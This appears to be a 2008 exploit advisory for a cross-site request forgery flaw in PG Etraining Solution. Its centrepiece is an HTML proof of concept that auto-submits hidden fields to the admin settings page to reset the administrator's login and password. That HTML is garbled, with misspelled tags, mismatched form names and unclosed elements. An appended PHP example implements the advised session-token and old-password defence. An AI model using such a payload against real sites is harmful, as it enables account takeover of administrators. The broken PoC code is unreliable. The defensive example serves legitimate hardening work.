PG Etraining Solution ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Author : Bug Researchers/n0x
Date : 21.12.2008 01:34:01
< ------------------- header data start ------------------- >
#############################################################
# Application Name : PG Etraining Solution
# Vulnerable Type : XSRF
# Infection : The admin password can be changed remotely and automatically.
# Bug Fix Advice : A session key (session token) should be added to the form, and the old password should be asked for.
# author : Bug Researchers/n0x
#############################################################
< ------------------- header data end of ------------------- >

< -- bug code start -- >
<b0dy onLoad=Submit();>
<script>function Submit[]{document.n0x.submit();}</script>
<form action=http://www.site.com/PATCH/admin/admin_settings.php method=post name=data>
<input type=hidden name=sel value=1>
<input type=hidden name=par value=change>
<input type=hidden class=inpBox value=Administrator name=name maxlength=60 size=40>
<input type=hidden class=inpBox value= name=surename maxlength=60 size=40>
<input name=phone class=inpBox type=hidden value=011-111-1112 maxlength=60 size=40>
<input name=email class=inpBox type=hidden value=add@dd.com maxlength=60 size=40>
<input type=hidden class=inpBox value=London name=city maxlength=60 size=40>
<select class=hidden name=countryid size=1><option label=Afghanistan value=1></option>
<input type=hidden class=inpBox value=PG Etraining Solution name=company maxlength=40 size=40>
<input type=hidden class=inpBox value=add name=login size=40>
<input type=hidden class=inpBox name=password size=40 value=add>
<input type=submit value=create name=B1>
< -- bug code end of -- >
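
The fix advice above (a session token in the form, plus asking for the old password), sketched as an added example in PHP; this is not PG Etraining Solution code or the advisory author's. The field names `csrf_token` and `old_password`, both helper functions and the demo data are assumptions.

```php
<?php
// Added example, not PG Etraining Solution code. The field names
// csrf_token / old_password and both helpers are hypothetical.
declare(strict_types=1);

// Issue one random token per session; the settings form embeds it as a
// hidden field, so a page on another origin cannot know the value.
function csrf_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a POSTed settings change may proceed.
// $storedHash is the admin's current hash as produced by password_hash().
function settings_change_allowed(array $session, array $post, string $storedHash): array
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Reject when no token was issued or the form did not echo it back.
    if (!is_string($supplied) || $expected === '' || !hash_equals($expected, $supplied)) {
        return [false, 'missing or invalid session token'];
    }
    // Require the current password before accepting a new one.
    $old = $post['old_password'] ?? '';
    if (!is_string($old) || !password_verify($old, $storedHash)) {
        return [false, 'old password incorrect'];
    }
    return [true, 'ok'];
}

// Constructed demo data.
$session = [];
$token   = csrf_issue($session);
$hash    = password_hash('current-secret', PASSWORD_DEFAULT);

// 1) Cross-site auto-submitted form: carries the fields but no token.
$forged   = ['par' => 'change', 'login' => 'add', 'password' => 'add'];
// 2) Genuine form: token from the rendered page plus the old password.
$genuine  = $forged + ['csrf_token' => $token, 'old_password' => 'current-secret'];
// 3) Token present, old password wrong.
$wrongOld = $forged + ['csrf_token' => $token, 'old_password' => 'guess'];

foreach (['forged' => $forged, 'genuine' => $genuine, 'wrong old' => $wrongOld] as $label => $post) {
    [$ok, $why] = settings_change_allowed($session, $post, $hash);
    printf("%-10s %s (%s)\n", $label, $ok ? 'ACCEPT' : 'REJECT', $why);
}
```

The old-password check matters independently of the token: it still blocks the change if a token leaks, for example through an XSS flaw on the same origin.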